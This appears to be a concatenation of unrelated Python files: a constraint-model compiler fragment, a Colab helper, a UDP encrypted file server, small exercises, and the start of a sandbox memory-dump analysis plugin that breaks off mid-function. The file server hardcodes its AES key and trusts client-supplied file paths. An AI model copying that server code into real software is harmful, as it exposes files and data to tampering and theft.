self._compile_op_assign_arg_2(fc, modeler.less)
def _compile_pred_float_max(self, fc):
self._compile_op_assign_arg_2(fc, modeler.max_of)
def _compile_pred_float_min(self, fc):
self._compile_op_assign_arg_2(fc, modeler.min_of)
def _compile_pred_float_ne(self, fc):
self._compile_op_arg_2(fc, modeler.diff)
def _compile_pred_float_ne_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.diff)
def _compile_pred_float_plus(self, fc):
self._compile_op_assign_arg_2(fc, modeler.plus)
# Int predicates
def _compile_pred_int_abs(self, fc):
self._compile_op_assign_arg_1(fc, modeler.abs_of)
def _compile_pred_int_div(self, fc):
self._compile_op_assign_arg_2(fc, modeler.int_div)
def _compile_pred_int_eq(self, fc):
self._compile_xxx_eq(fc)
def _compile_pred_int_eq_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.equal)
def _compile_pred_int_le(self, fc):
self._compile_op_arg_2(fc, modeler.less_or_equal)
def _compile_pred_int_le_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.less_or_equal)
def _compile_pred_int_lin_eq(self, fc):
self._compile_scal_prod(fc, modeler.equal)
def _compile_pred_int_lin_le(self, fc):
self._compile_scal_prod(fc, modeler.less_or_equal)
def _compile_pred_int_lin_ne(self, fc):
self._compile_scal_prod(fc, modeler.diff)
def _compile_pred_int_lin_eq_reif(self, fc):
self._compile_scal_prod(fc, modeler.equal, True)
def _compile_pred_int_lin_le_reif(self, fc):
self._compile_scal_prod(fc, modeler.less_or_equal, True)
def _compile_pred_int_lin_ne_reif(self, fc):
self._compile_scal_prod(fc, modeler.diff, True)
def _compile_pred_int_lt(self, fc):
self._compile_op_arg_2(fc, modeler.less)
def _compile_pred_int_lt_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.less)
def _compile_pred_int_max(self, fc):
self._compile_op_assign_arg_2(fc, modeler.max_of)
def _compile_pred_int_min(self, fc):
self._compile_op_assign_arg_2(fc, modeler.min_of)
def _compile_pred_int_mod(self, fc):
self._compile_op_assign_arg_2(fc, modeler.mod)
def _compile_pred_int_ne(self, fc):
self._compile_op_arg_2(fc, modeler.diff)
def _compile_pred_int_ne_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.diff)
def _compile_pred_int_plus(self, fc):
self._compile_op_assign_arg_2(fc, modeler.plus)
def _compile_pred_int_times(self, fc):
self._compile_op_assign_arg_2(fc, modeler.times)
def _compile_pred_int2float(self, fc):
self._compile_xxx_eq(fc)
# Set predicates
def _compile_pred_set_in(self, fc):
self._compile_op_arg_2(fc, modeler.allowed_assignments)
def _compile_pred_set_in_reif(self, fc):
self._compile_op_assign_arg_2(fc, modeler.allowed_assignments)
# Custom predicates
def _compile_pred_all_different_int(self, fc):
self._compile_op_arg_1(fc, modeler.all_diff)
def _compile_pred_count_eq_const(self, fc):
self._compile_op_assign_arg_2(fc, modeler.count)
def _compile_pred_lex_lesseq_int(self, fc):
self._compile_op_arg_2(fc, modeler.lexicographic)
def _compile_pred_lex_lesseq_bool(self, fc):
self._compile_op_arg_2(fc, modeler.lexicographic)
def _compile_pred_int_pow(self, fc):
self._compile_op_assign_arg_2(fc, modeler.power)
def _compile_pred_cumulative(self, fc):
""" Requires that a set of tasks given by start times s, durations d, and resource requirements r,
never require more than a global resource bound b at any one time.
Args:
fc: Constraint descriptor, with arguments
stime: Tasks start time
tdur: Tasks tasks durations
rreq: Task resource requirements
bnd: Global resource bound
"""
#print("Process cumulative constraint {}".format(fc))
# Access constraint arguments
stime, tdur, rreq, bnd = fc.args
# Create interval vars and cumul atoms
ls = _get_fzn_array(stime)
ld = _get_fzn_array(tdur)
lr = _get_fzn_array(rreq)
#print("ls: {}\nld: {}\nlr: {}".format(ls, [s for s in ld], lr))
cumul_atoms = []
for s, d, r in zip(ls, ld, lr):
vname = None
# Get start time
if isinstance(s, FznVariable):
ds = s._get_domain_bounds()
vname = s.name
else:
ds = (s, s)
# Get duration
if isinstance(d, FznVariable):
dd = d._get_domain_bounds()
if vname is None:
vname = d.name
else:
dd = (d, d)
# Get requirement
if isinstance(r, FznVariable):
dr = r._get_domain_bounds()
if vname is None:
vname = r.name
else:
dr = (r, r)
#print("ds: {}, dd: {}, dr: {}".format(ds, dd, dr))
# Create interval variable
if vname is None:
vname = self.interval_gen.allocate()
else:
vname = "Itv_" + vname
if vname in self.cpo_exprs:
cnt = 1
nname = vname + "_1"
while nname in self.cpo_exprs:
cnt += 1
nname = vname + "_" + str(cnt)
vname = nname
# Create interval variable
ivar = self.cpo_exprs.get(vname)
if ivar:
# Check it is the same
assert isinstance(ivar, CpoIntervalVar) and ivar.get_start() == ds and ivar.get_size() == dd and ivar.get_end() == (INTERVAL_MIN, INTERVAL_MAX)
else:
ivar = interval_var(start=ds, end=(INTERVAL_MIN, INTERVAL_MAX), size=dd, name=vname)
self.cpo_exprs[vname] = ivar
# Create pulse
pulse = modeler.pulse(ivar, dr)
cumul_atoms.append(pulse)
# Replace previous variable by access to interval variable
if isinstance(s, FznVariable):
self._assign_to_var(s, modeler.start_of(ivar))
if isinstance(d, FznVariable):
self._assign_to_var(d, modeler.size_of(ivar))
if isinstance(r, FznVariable):
self._assign_to_var(r, modeler.height_at_start(ivar, pulse))
# Create final constraint
cumf = CpoFunctionCall(Oper_sum, Type_CumulFunction, (CpoValue(cumul_atoms, Type_CumulAtomArray),))
self._add_to_model(modeler.greater_or_equal(self._get_cpo_expr(bnd), cumf))
def _compile_pred_subcircuit(self, fc):
""" Constrains the elements of x to define a subcircuit where x[i] = j means that j is the successor of i and x[i] = i means that i is not in the circuit.
"""
x = [0] + list(self._get_cpo_expr(fc.args[0]).value)
self._add_to_model(CpoFunctionCall(Oper__sub_circuit, Type_Constraint, (build_cpo_expr(x),) ))
def _compile_pred_inverse(self, fc):
""" Constrains two arrays of int variables, f and invf, to represent inverse functions. All the values in each array must be within the index set of the other array.
Args:
f: First function as array of int
invf: Inverse function
"""
f, invf = fc.args
f = [0] + list(self._get_cpo_expr(f).value)
invf = [0] + list(self._get_cpo_expr(invf).value)
self._add_to_model(CpoFunctionCall(Oper_inverse, Type_Constraint, (build_cpo_expr(f), build_cpo_expr(invf))))
def _compile_pred_bool_clause(self, fc):
""" Implementation of bool_clause predicate
Args:
a: First array of booleans
b: Second array of booleans
"""
a, b = fc.args
# Default implementation
exprs = list(self._get_cpo_expr(a).value)
for x in self._get_cpo_expr(b).value:
exprs.append(1 - x)
self._add_to_model(modeler.sum_of(exprs) >= 1)
# Alternative implementation
# self._add_to_model( (modeler.max_of(a) > 0) | (modeler.min_of(b) == 0) )
# Other alternative implementation
# expr = None
# for x in _get_value(a):
# x = x > 0
# expr = x if expr is None else modeler.logical_or(expr, x)
# for x in _get_value(b):
# x = x == 0
# expr = x if expr is None else modeler.logical_or(expr, x)
# self._add_to_model(expr)
def _compile_pred_table_int(self, fc):
""" Implement custom predicate table_int
Args:
vars: Array of variables
values: List of values
"""
vars, values = fc.args
# Split value array in tuples
vars = self._get_cpo_expr(vars).value
tsize = len(vars)
if tsize != 0:
values = self._get_cpo_expr(values).value
tuples = [values[i: i + tsize] for i in range(0, len(values), tsize)]
# Build allowed assignment expression
self._add_to_model(modeler.allowed_assignments(vars, tuples))
def _compile_pred_lex_less_bool(self, fc):
""" Requires that the array vars1 is strictly lexicographically less than array vars2
Args:
vars1: First array of variables
vars2: Second array of variables
"""
vars1, vars2 = fc.args
# Add 0 and 1 at the end of arrays to force inequality
vars1 = list(self._get_cpo_expr(vars1).value) + [1]
vars2 = list(self._get_cpo_expr(vars2).value) + [0]
self._add_to_model(modeler.lexicographic(vars1, vars2))
def _compile_pred_lex_less_int(self, fc):
self._compile_pred_lex_less_bool(fc)
def _get_domain_bounds(self, x):
""" Get min and max bounds of an expression, integer variable or integer
Args:
expr: CPO integer variable or expression
Returns:
Tuple (min, max)
"""
# Case of variable or variable replaced by an expression
if isinstance(x, CpoIntVar):
return (x.get_domain_min(), x.get_domain_max())
if isinstance(x, CpoFunctionCall):
if x.operation is Oper_start_of:
return x.children[0].get_start()
if x.operation is Oper_size_of:
return x.children[0].get_size()
# if x.is_kind_of(Type_BoolExpr):
# return (0, 1)
cpov = self.cpo_exprs.get(x.name)
if isinstance(cpov, CpoIntVar):
return (cpov.get_domain_min(), cpov.get_domain_max())
raise FznParserException("Unknow expression to take bounds from: {}".format(x))
if isinstance(x, CpoValue):
x = x.value
if is_int(x):
return (x, x)
return x
def _assign_to_var(self, var, expr):
""" Set a identifier with an expression
Args:
var: Target FZN variable
expr: CPO expression to assign
Returns:
None. If needed, changes are done in reader context.
"""
#print("_assign_to_var {} expression {}".format(var, expr))
# Retrieve existing expression
vname = var.name
vexpr = self.cpo_exprs.get(vname)
# Check if reduction
if (not self.reduce) or (vname in self.cpo_variables) or (vexpr is not None and not isinstance(vexpr, CpoIntVar)):
self._add_to_model(modeler.equal(vexpr, expr))
else:
# Assign new name to expression
self.cpo_exprs[vname] = expr
expr.set_name(vname)
# Constrain expression to variable domain
self._constrain_expr_domain(expr, var)
def _make_equal(self, var, expr, dvar):
""" Make equal two FZN expressions
Args:
var: FZN variable or value
expr: CPO expression to be equal with
dvar: Define variable, None if none
Returns:
None. If needed, changes are done in reader context.
"""
# Check if var is not a variable
if not isinstance(var, FznVariable):
self._add_to_model(modeler.equal(expr, self._get_cpo_expr(var)))
return
# Check no reduction
if not self.reduce or (dvar is not var):
self._add_to_model(modeler.equal(self._get_cpo_expr(var), expr))
return
# Assign to variable
self._assign_to_var(var, expr)
def _constrain_expr_domain(self, expr, var):
""" Constrain the domain of an expression to the domain of a variable
Args:
expr: CPO expression to constrain
var: CPO or FZN integer var to take domain from
"""
dom = var.domain
#print(" constrain expression {} to domain {}".format(expr, dom))
dmin = expression.get_domain_min(dom)
dmax = expression.get_domain_max(dom)
# Check boolean expression
if dmin == 0 and dmax == 1:
return
if expr.is_kind_of(Type_BoolExpr) and (dmin <= 0) and (dmax >= 1):
return
# Add appropriate constraint
if len(dom) == 1: # Single segment
# Use range
if dmin == dmax:
self._add_to_model(modeler.equal(expr, dmin))
else:
self._add_to_model(modeler.range(expr, dmin, dmax))
else:
# Use allowed assignment
self._add_to_model(modeler.allowed_assignments(expr, expression._domain_iterator(dom)))
def _compile_op_assign_arg_1(self, fc, op):
""" Compile operation with single argument equal to a result
Args:
fc: Constraint descriptor
op: CPO operation to apply to first argument
"""
# Access constraint arguments
a, r = fc.args
# Assign to expression
self._make_equal(r, op(self._get_cpo_expr(a)), fc.defvar)
def _compile_op_assign_arg_2(self, fc, op):
""" Compile operation with two arguments equal to a result
Args:
fc: Constraint descriptor
op: CPO operation to apply to arguments
"""
# Access constraint arguments
a, b, r = fc.args
# Assign to expression
self._make_equal(r, op(self._get_cpo_expr(a), self._get_cpo_expr(b)), fc.defvar)
def _compile_op_arg_1(self, fc, op):
""" Compile operation with one arguments and no result
Args:
fc: Constraint descriptor
op: CPO operation to apply to argument
"""
self._add_to_model(op(self._get_cpo_expr(fc.args[0])))
def _compile_op_arg_2(self, fc, op):
""" Compile operation with two arguments and no result
Args:
fc: Constraint descriptor
op: CPO operation to apply to arguments
"""
a, b = fc.args
self._add_to_model(op(self._get_cpo_expr(a), self._get_cpo_expr(b)))
def _compile_array_xxx_element(self, fc):
""" Compile access to array element """
x, t, r = fc.args
if not is_int(x):
x = self._get_cpo_expr(x)
self._make_equal(r, modeler.element(self._get_cpo_expr(t), x - 1), fc.defvar)
def _compile_xxx_eq(self, fc):
""" Compile all equality predicates """
# Access constraint arguments
a, b = fc.args
# Check default case
if not self.reduce:
self._add_to_model(modeler.equal(self._get_cpo_expr(a), self._get_cpo_expr(b)))
return
# Process trivial cases
if a is b:
return None
# Retrieve defined variable
defvar = fc.defvar
if defvar is None:
self._add_to_model(modeler.equal(self._get_cpo_expr(a), self._get_cpo_expr(b)))
return
if defvar is a:
self._assign_to_var(a, self._get_cpo_expr(b))
else:
self._assign_to_var(b, self._get_cpo_expr(a))
def _compile_scal_prod(self, fc, op, reif=False):
""" Compile a scalar product
Args:
fc: Constraint
op: Comparison operation
"""
# Access constraint arguments
if reif:
coefs, vars, res, reif = fc.args
else:
coefs, vars, res = fc.args
# Check no reduction
defvar = fc.defvar
if not self.reduce or not defvar:
expr = op(modeler.scal_prod(self._get_cpo_expr(coefs), self._get_cpo_expr(vars)), self._get_cpo_expr(res))
if reif:
expr = modeler.equal(self._get_cpo_expr(reif), expr)
self._add_to_model(expr)
return
# Get array elements
coefs = _get_fzn_array(coefs)
vars = _get_fzn_array(vars)
# Check if defined variable is the result
if defvar is res or defvar is reif:
expr = self._build_scal_prod_expr(coefs, vars, 0)
else:
# Arrange expression to have defined variable on the left
vx = vars.index(defvar)
vcoef = coefs[vx]
vars = vars[:vx] + vars[vx + 1:]
coefs = coefs[:vx] + coefs[vx + 1:]
expr = res if is_int(res) else self._get_cpo_expr(res)
if vcoef < 0:
vcoef = -vcoef
expr = -expr
else:
coefs = list([-c for c in coefs])
# Build result
expr = self._build_scal_prod_expr(coefs, vars, expr)
if vcoef != 1:
expr = expr / vcoef
# Check reif
if reif:
expr = op(expr, self._get_cpo_expr(res))
self._assign_to_var(defvar, expr)
else:
# Check equality with a variable
if op is modeler.equal:
self._assign_to_var(defvar, expr)
else:
self._add_to_model(op(expr, self._get_cpo_expr(defvar)))
def _build_scal_prod_expr(self, coefs, vars, res):
""" Build a scal prod expression
Args:
coefs: Array of coefficients (integers)
vars: Array of FZN variables
res: Initial result value (integer)
Returns:
New CPO scal_prod expression
"""
# Build array of CPO variables
vars = [self._get_cpo_expr(v) for v in vars]
# Check developed scal_prod
if len(coefs) <= 2 or (all(c == 1 or c == -1 for c in coefs)):
for c, v in zip(coefs, vars):
if c != 0:
if is_int_value(res, 0):
res = _mutl_by_int(v, c)
elif c < 0:
res = res - _mutl_by_int(v, -c)
else:
res = res + _mutl_by_int(v, c)
return res
# Build normal scal_prod
expr = modeler.scal_prod(coefs, vars)
if not is_int_value(res, 0):
expr = res + expr
return expr
def _add_to_model(self, expr):
""" Add an expression to the CPO model
Args:
expr: CPO expression to add
"""
#print("_add_to_model({})".format(expr))
self.model.add(expr)
# Scan expression to identify used variables
estack = [expr]
doneset = set() # Set of expressions already processed
while estack:
e = estack.pop()
eid = id(e)
if not eid in doneset:
doneset.add(eid)
if e.type.is_variable:
#print(" add CPO variable {}".format(e))
self.cpo_variables.add(e.name)
# Stack children expressions
estack.extend(e.children)
def _write(self, out=None):
""" Write current parser status
Args:
out (optional): Write output. sys.stdout if not given
"""
if out is None:
out = sys.stdout
out.write("Reader status:\n")
out.write(" CPO expressions:\n")
for k in sorted(self.cpo_exprs.keys()):
v = self.cpo_exprs[k]
out.write(" {}: {} ({})\n".format(k, v, type(v)))
out.write(" Model expressions:\n")
for x in self.model.get_all_expressions():
out.write(" {}\n".format(x[0]))
###############################################################################
## Utility functions
###############################################################################
def _get_fzn_array(fzo):
""" Get the list of objects of an FZN object
Args:
fzo: FZN object
Returns:
Array of FZN objects
"""
return fzo if isinstance(fzo, list) else fzo.value
def _get_value(expr):
""" Get the python value of an expression
Args:
expr: Expression (python or CPO)
Returns:
Python value
"""
return expr.value if isinstance(expr, CpoValue) else expr
def _build_domain(v):
""" Build a variable domain from an initial value
Args:
v: Variable initial value
Returns:
Variable domain
"""
if v is True:
return (1,)
if v is False:
return (0,)
return (v,)
# def _build_cpo_value(v):
# """ Build a value from a single Python value
# Args:
# v: Value
# Returns:
# Corresponding CPO value
# """
# if v is True:
# v = 1
# elif v is False:
# v = 0
# return build_cpo_expr(v)
def _mutl_by_int(expr, val):
""" Create an expression that multiply an expression by an integer
Args:
expr: Expression to constrain
val: Integer value to multiply expression with
Returns:
New expression
"""
if val == 1:
return expr
if val == -1:
return -expr
if val == 0:
return 0
return val * expr
|
def mount_drive():
from google.colab import drive
drive.mount('/content/gdrive')
my_drive = '/content/gdrive/My Drive/'
image_folder = my_drive + 'TestImages/'
training_folder = my_drive + "Traning/"
return my_drive, image_folder, training_folder |
import socket
from Cryptodome.Cipher import AES
import time
import os.path, os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from lazyme.string import color_print
# closing will close the file and exit the client program
# def closing():
# print('closing socket')
# s.close()
# exit()
#sending will send a file to the client
def sending(name, fname):
server_address = (socket.gethostname(), 10100) #create a new socket address
# #if the file doesnt exit, close the socket and exit program
# if not (os.path.exists(fname.decode())):
# print("file not found, closing")
# s.close()
# exit()
#f = open(fname.decode('utf-8'), 'rb') #open the requested file
message = open(fname.decode(), 'r') #open the requested file
buffer = 4000 # Buffer size
key = b'Sixteen byte key' # key = get_random_bytes(16)
while (True):
snippet = message.read(buffer) #read buffer-sized byte section of the file
user_pem = 'server_files/keys/'+name.decode()+'.pem'
print('[!] using pem file to encrypt : ', user_pem)
if len(snippet) < 1: break#if there is no more of the file to be read, close it and end program
with open(user_pem, "rb") as key_file:
public_key = serialization.load_pem_public_key(
key_file.read(),
backend=default_backend()
)
# send the AES nonce and the tag over encrypted channel ecrypted by ublic key
cipher = AES.new(key, AES.MODE_EAX) #create cipher object for encryption
nonce = cipher.nonce #generate nonce number
ciphertext, tag = cipher.encrypt_and_digest(snippet.encode("utf-8")) #encrypt f and generate a tag for integrity-checking
meta_decrypt = b'uniqueword' + tag + b'uniqueword' + nonce
print("[!] nonce : ", nonce, " tag : ", tag)
AES_meta_encrypted = public_key.encrypt(
meta_decrypt,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
s.sendto(AES_meta_encrypted, server_address) #send the ciphertext, tag, and nonce to the server
time.sleep(.05) #required to send each section error-free
s.sendto(ciphertext, server_address) #send the ciphertext, tag, and nonce to the server
#receiving will recieve a file from the client
def receiving(ciphertext):
try:
while (True):
nonce, tag = meta_decrypt(ciphertext)
ciphertext, address = s.recvfrom(buf) #recieve ciphertext sent
#print('received {}'.format(ciphertext))
cipher = AES.new(key, AES.MODE_EAX, nonce=nonce) #create cipher object for decryption
plaintext = cipher.decrypt(ciphertext) #decrypt cipher text
decoded_plaintext = plaintext.decode()
instruction = decoded_plaintext[0:13:1] # find out what instruction
decoded_plaintext = decoded_plaintext[13:] # discard extracted information
print('[*] instruction : ', instruction)
if instruction == "__verify__msg":
username = decoded_plaintext[:decoded_plaintext.find(",")] # find username appended to front of original_mesage
decoded_plaintext = decoded_plaintext.replace(username+',', '') # discard username
filename = decoded_plaintext[:decoded_plaintext.find(",")] # find filename appended to front of original_message
decoded_plaintext = decoded_plaintext.replace(filename+',', '') # discard filename
print("username : ", username, " filename : ", filename)
try :
verified = verification(username.encode())
if not verified :
raise ValueError
except ValueError:
print("Key incorrect or message corrupted or access from unverified user")
print('Not processing request!')
return
if decoded_plaintext[0:13:1] == "__verify__add":
decoded_plaintext = decoded_plaintext[13:]+" " # find username appended to front of original_mesage
print("adding : ", decoded_plaintext)
add_user(decoded_plaintext)
return
elif decoded_plaintext[0:13:1] == "__verify__rmv":
decoded_plaintext = decoded_plaintext[13:]+" " # find username appended to front of original_mesage
print("removing : ", decoded_plaintext)
rmv_user(decoded_plaintext)
return
# try to verify message with tag. If its been changed in transit, throw ValueError and close file/socket and exit
try:
if not verified :
raise ValueError
cipher.verify(tag) #verify the tag to check integrity
print("The message is authentic : ", decoded_plaintext, " from : ", username)
f = open('server_files/files/'+filename, 'wb') #open file that will be written to
f.write(decoded_plaintext.encode())
except ValueError:
print("Key incorrect or message corrupted or access from unverified user")
print('Closing')
s.close()
exit()
s.settimeout(2)
ciphertext, address = s.recvfrom(buf)
except socket.timeout:
print('closing')
f.close()
s.close()
exit()
def verification(username):
username = username.decode().strip()
f = open("server_files/banned_users.txt")
for x in f:
if username == x :
msg = "Message from bad user : " + username + "\n"
color_print(msg, color="red", underline=True)
return 0
f = open("server_files/verified_users.txt")
for x in f:
if username == x.strip() :
msg = "Message from verified : " + username + "\n"
color_print(msg, color="green", underline=True)
return 1
msg = "Message from bad user : " + username + "\n"
color_print(msg, color="red", underline=True)
return 0
def add_user(new_user_info):
key_start = new_user_info.find('__verify__key') + 13
username = new_user_info[:(new_user_info.find('__verify__key')-1)].strip()
print('un : ', username)
key = new_user_info[key_start:]
write_verified = open("server_files/verified_users.txt", 'a')
write_verified.write(username + "\n")
new_user_pem_file = 'server_files/keys/' + username + '.pem'
new_user_pem_file = new_user_pem_file.strip()
write_key = open(new_user_pem_file, 'wb')
write_key.write(key.encode())
def rmv_user(new_user_info):
username = new_user_info[:(new_user_info.find('__verify__key')-1)].strip()
verified_file = "server_files/verified_users.txt"
print('un : ', username)
if os.path.exists("server_files/keys/"+username+".pem"):
os.remove("server_files/keys/"+username+".pem")
filename = "server_files/verified_users.txt"
else:
print("The user is not a verified member in the group")
return
read = open(verified_file)
read = list(read)
open(verified_file, 'w').close() # clears the file
print("read : ", read)
with open(verified_file, 'w') as f:
for item in read:
if item.strip() != username :
print("writing : ", item)
f.write("%s" % item)
print("[!] User removed ", username)
def meta_decrypt(meta_decrypt):
with open("server_files/server_keys/private_key.pem", "rb") as key_file:
private_key = serialization.load_pem_private_key(
key_file.read(),
password=None,
backend=default_backend()
)
AES_meta = private_key.decrypt(
meta_decrypt,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
AES_meta = AES_meta[10:]
tag = AES_meta[:AES_meta.find(b'uniqueword')] #separate ciphertext and tag from ciphertext variable
AES_meta = AES_meta[10:]
nonce = AES_meta[(AES_meta.find(b'uniqueword')+10):] #separate nonce from ciphertext variable
return nonce, tag
# Create a UDP/IP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind the socket to the port
server_address = (socket.gethostname(), 10000)
print('starting up on {} port {}'.format(*server_address))
s.bind(server_address) #bind the socket to the address
buf = 4096 #reading buffer size
key = b'Sixteen byte key' # Generate key for AES encryption
print('[*]Waiting for a connection')
while(True):
ciphertext, address = s.recvfrom(buf) #recieve ciphertext sent
print("[*]Recived ciphertext")
name_index = ciphertext.find(b'isafile')
name = ciphertext[:name_index]
#if there is an isafile in a message, call sending function, else call receiving function
ignore1, ignore2, filename = ciphertext.rpartition(b'isafile')
if ignore2 :
try :
verified = verification(name)
if not verified :
raise ValueError
else :
print("[*] sending : ", filename)
sending(name, filename)
except ValueError:
print("Key incorrect or message corrupted or access from unverified user")
print('Not processing request!')
else:
receiving(ciphertext)
|
import random
import sys
import datetime
def main(data_size, file_num):
file_name = "data" + str(file_num) + ".txt"
with open(file_name, "w") as f:
track = random.randint(1, data_size - 2)
f.write(str(data_size) + " " + str(track) + "\n")
for i in range(0, data_size):
w = random.randint(0, 10000)
f.write(str(w) + "\n")
if __name__ == "__main__":
if not (len(sys.argv) == 3):
print "Invalide argment"
random.seed(datetime.datetime.today().second)
main(int(sys.argv[1]), sys.argv[2])
|
# Problem 1: Two Sum
class Solution(object):
def twoSum(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
# Given an array of integers, return indices of the two numbers such that they add up to a specific target.
# You may assume that each input would have exactly one solution, and you may not use the same element twice.
# total = 0
# for key, value in nums
# total = total + value
# for key1, value1 in nums
# if key != key1
# total = total + value1
# if total == target
# return [key, key1]
total = 0
for x in range(0, len(nums)):
total = 0
for y in range(0, len(nums)):
if x != y:
total = nums[x] + nums[y]
if total == target:
return [x, y]
# Problem 2: Implement a Queue Using Stacks
class MyQueue(object):
# Implement the following operations of a queue (FIFO) using stacks (LIFO).
# Depending on your language, stack may not be supported natively. You may simulate a stack by using a list or deque(double-ended queue), as long as you use only standard operations of a stack.
# You may assume that all operations are valid (for example, no pop or peek operations will be called on an empty queue).
# You must use only standard operations of a stack -- which means only:
# peek from top
# pop from top
# push to bottom
# size
# is empty
def __init__(self):
"""
Initialize your data structure here.
"""
self.stack1 = []
self.stack2 = []
def push(self, x):
"""
Push element x to the back of queue.
:type x: int
:rtype: None
"""
# while self.stack1 not empty, append its last element to stack2
while self.stack1:
popped1 = self.stack1.pop()
self.stack2.append(popped1)
# then append x to stack1, which is empty
self.stack1.append(x)
# then put all the other elements, now on stack2, back on stack1
while self.stack2:
popped2 = self.stack2.pop()
self.stack1.append(popped2)
def pop(self):
"""
Removes the element from in front of queue and returns that element.
:rtype: int
"""
# remove last element of stack, which is front element of queue, and return it
popped = self.stack1.pop()
return popped
def peek(self):
"""
Get the front element.
:rtype: int
"""
# return last element of stack, which is front element of queue (no removal)
front_element = self.stack1[-1]
return front_element
def empty(self):
"""
Returns whether the queue is empty.
:rtype: bool
"""
# if both stacks are empty, return true; else return false
if not self.stack1 and not self.stack2:
is_empty = True
else:
is_empty = False
return is_empty
# Your MyQueue object will be instantiated and called as such:
# obj = MyQueue()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.peek()
# param_4 = obj.empty()
|
# mdump basic function
from __future__ import print_function
import time
import sys
from api import CallbackManager
import api
import bisect
from collections import defaultdict
import functools
from volatility.plugins.overlays.windows.xp_sp2_x86_syscalls import syscalls
from utils import ConfigurationManager as conf_m
requirements = ["plugins.guest_agent"]
# Callback manager
cm = None
# Set printer
pyrebox_print = None
mdump_path = "dump_result/"
# max running time from config file
try:
MAX_RUNNING_TIME = int(conf_m.config.get('MDUMP', 'runtime'))
except:
pyrebox_print("No run time is specified, the default run time will be used.")
MAX_RUNNING_TIME = 600
# script initial start time
s_start_time = 0
# time gap between calling damm
mdump_interval = 10
# the last time called damm
mdump_tb_time = 0
# number of db file
db_num = 0
# number of diff.json file
diff_num = 1
# MAX_TB_NUM = 1000000
# tb_num = 0
# calling damm or not
MDUMP_DAMM = conf_m.config.get('MDUMP', 'damm')
# make sure damm execute before NtUserGetMessage
MDUMP_FLAG = True
# print on the screen and a txt file
MDUMP_LOG = conf_m.config.get('MDUMP', 'text_log')
# a buffer that stores the log
mdump_buffer = []
# Get the API list mode
MDUMP_AT_SYSCALL = 1
MDUMP_AT_CALL_API = 2
MDUMP_AT_RUN_TB = 3
MDUMP_MODE_TYPE = MDUMP_AT_SYSCALL
mdump_mode = conf_m.config.get('MDUMP', 'mode')
if mdump_mode not in ['api', 'syscall', 'tb']:
pyrebox_print("error API LIST mode:{}".format(mdump_mode))
if mdump_mode == 'api':
MDUMP_MODE_TYPE = MDUMP_AT_CALL_API
elif mdump_mode == 'syscall':
MDUMP_MODE_TYPE = MDUMP_AT_SYSCALL
else:
MDUMP_MODE_TYPE = MDUMP_AT_RUN_TB
# modules for the process
modules = defaultdict(lambda :(0,0))
# symbols info
mdump_symbols_loaded = False
TARGET_LONG_SIZE = api.get_os_bits() / 8
process_syms = []
target_procname = conf_m.config.get('MDUMP', 'target')
process_symbols_file = "/tmp/proc.symbols."+target_procname+'.'+conf_m.config.get('VOL', 'profile')+'.bin'
# symbols for ntdll
ntdll_syms = []
ntdll_name= "ntdll.dll"
ntdll_symbols_file = "/tmp/ntdll.symbols."+conf_m.config.get('VOL', 'profile')+'.bin'
KiFastSystemCall_addr = -1 #xp sp2=0x7c92e4f0
KiFastSystemCall_name = "KiFastSystemCall"
# winXP_Exclude_syscalls = [0x11a5, #NtUserGetMessage
# 0x1165 #NtUserDispatchMessage
# ]
winXP_Exclude_syscalls = []
class Symbol:
def __init__(self, mod, func, addr):
self.mod = mod
self.func = func
self.addr = addr
def __lt__(self, other):
return self.addr < other.addr
def __le__(self, other):
return self.addr <= other.addr
def __eq__(self, other):
return self.addr == other.addr
def __ne__(self, other):
return self.addr != other.addr
def __gt__(self, other):
return self.addr > other.addr
def __ge__(self, other):
return self.addr >= other.addr
def mdump_clean(tmppath):
import os,glob
rmfiles = []
rmfiles.extend(glob.glob(tmppath+"*.json"))
rmfiles.extend(glob.glob(tmppath+"*.db"))
rmfiles.extend(glob.glob(tmppath+"*.txt"))
for f in rmfiles:
os.remove(f)
def mdump_print(mdump_log):
global mdump_buffer
if type(mdump_log) != str:
mdump_log = str(mdump_log)
if MDUMP_LOG == "True":
if len(mdump_buffer) >= 100:
with open("{0}/{1}_{2}_log.txt".format(mdump_path, target_procname, mdump_mode), 'a') as f:
for log in mdump_buffer:
f.write(log+'\n')
f.write(mdump_log+'\n')
mdump_buffer = []
else:
mdump_buffer.append(mdump_log)
def mdump_call_damm():
from libdamm.api import API as DAMM
# from scripts.dealjson import sqlite_to_json
# from scripts.dealjson import diff2Graph
global pyrebox_print
global cm
global db_num
global diff_num
damm = DAMM(plugins=['all'], profile=conf_m.config.get('VOL', 'profile'), db=mdump_path+"res"+str(db_num)+".db")
pyrebox_print("damm initialized")
results = damm.run_plugins()
for elem in results:
# print(elem)
pass
# sqlite_to_json(mdump_path+"res%d.db" % db_num, mdump_path+"res%d.json" % db_num)
# pyrebox_print("res%d.json file has been created" % (db_num))
# # compare the diff between two res.json and create diff.json files
# if db_num > 0:
# ret = diff2Graph(mdump_path+"res%d.json" % (db_num-1), mdump_path+"res%d.json" % db_num, mdump_path+"diff%d.json" % diff_num)
# print(ret)
# if ret is True:
# pyrebox_print("diff%d.json file has been created" % diff_num)
# diff_num += 1
db_num += 1
if time.time() - s_start_time >= MAX_RUNNING_TIME:
pyrebox_print("analyze over :)")
cm.clean()
def locate_module(addr):
global modules
for mod, value in modules.items():
base, size = value
if addr >= base and addr < base+size:
return mod
return None
def locate_nearest_symbol(addr):
global process_syms
mod = locate_module(addr)
if mod == None:
return None
base, size = modules[mod]
pos = bisect.bisect_left(process_syms, Symbol('', '', addr-base))
if pos < 0 or pos >= len(process_syms):
return None
while process_syms[pos].mod != mod and process_syms[pos].addr == addr - base and pos < len(process_syms)+1:
pos += 1
